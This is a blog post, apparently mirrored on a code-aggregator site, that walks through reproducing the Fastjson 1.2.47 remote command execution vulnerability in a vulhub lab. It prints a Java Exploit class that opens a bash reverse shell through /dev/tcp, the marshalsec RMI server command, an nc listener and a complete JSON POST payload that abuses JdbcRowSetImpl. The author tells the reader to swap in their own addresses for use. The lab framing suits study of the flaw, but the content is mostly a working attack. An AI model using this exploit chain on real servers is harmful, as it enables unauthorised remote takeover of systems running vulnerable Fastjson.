Fastjson 1.2.47 remote command execution vulnerability

Others 2020-04-14 14:58:58 views: null

Fastjson 1.2.47 does not com.sun.jndi.rmi.object.trustURLCodebasehave limitations in this version , so it caused this vulnerability. For specific analysis, please refer to the article

https://www.freebuf.com/vuls/208339.html

 

Prerequisites (avoid stepping on some pits)

Before reproducing this vulnerability, it is best to reproduce the deserialization of Fastjson 1.2.24, because the two vulnerability reproduction methods are very similar

1. It must be java 1.8 version, otherwise some commands cannot be compiled and executed, java -version view version

2. All tools and compiled packages must be in the same directory

marshalsec-0.0.3-SNAPSHOT-all.jar

Exploit.java

Exploit.class

 

Environment construction

https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.47-rce

Build complete access to ip: port 8090

 

 

 

Recurrence reference

https://www.cnblogs.com/websecyw/p/11905014.html

https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.47-rce

 

1. Get exp

git clone https://github.com/CaijiOrz/fastjson-1.2.47-RCE  

In fact, this exp is a code that rebounds the shell

public class Exploit {
    public Exploit(){
        try{
            Runtime.getRuntime().exec("/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/127.0.0.1/8888 0>&1");
        }catch(Exception e){
            e.printStackTrace();
        }
    }
    public static void main(String[] argv){
        Exploit e = new Exploit();
    }
}

2. vim  Exploit.java   modified to vpsIP and port

3.javac  Exploit.java   compiled into class file

 

 

 4. python -m SimpleHTTPServer 4444 Open http service

5.  java -cp marshalsec-0.0.3-SNAPSHOT-all.j marshalsec.jndi.RMIRefServer "http://vpsIP:4444/#Exploit" 9999

 

 

 6. Monitor nc -lvnp 7777

7. Send POC, it will rebound and shell

 

I write the entire data packet, and directly modify the address and port of the red letter when it is used.

POST / HTTP/1.1
Host: 目标ip
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/json
Content-Length: 264

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://vpsIP:9999/Exploit",
        "autoCommit":true
    }
}

8. Successful rebound shell

Guess you like

Origin www.cnblogs.com/null1433/p/12697682.html
Recommended
Ranking
A quick primer on numpy basics
Two sister tease python project
Java | Multiple keywords in the replacement content are returned to the front end in red style
C ++: references
The string leetcood 1018 is a binary prefix divisible by 5
Flutter 布局组件
Java combat spingboot-redis
PMP pre-exam sprint and wrong questions sorting
ActiveMq C# Message Features: Delayed and Timed Message Delivery
DSP28377S_ copy a program from the RAM to FLASH portion DETAILS
Daily
More
2024-05-16(23)
2024-05-15(5)
2024-05-14(9)
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)

Code World

© 2018 codetd.com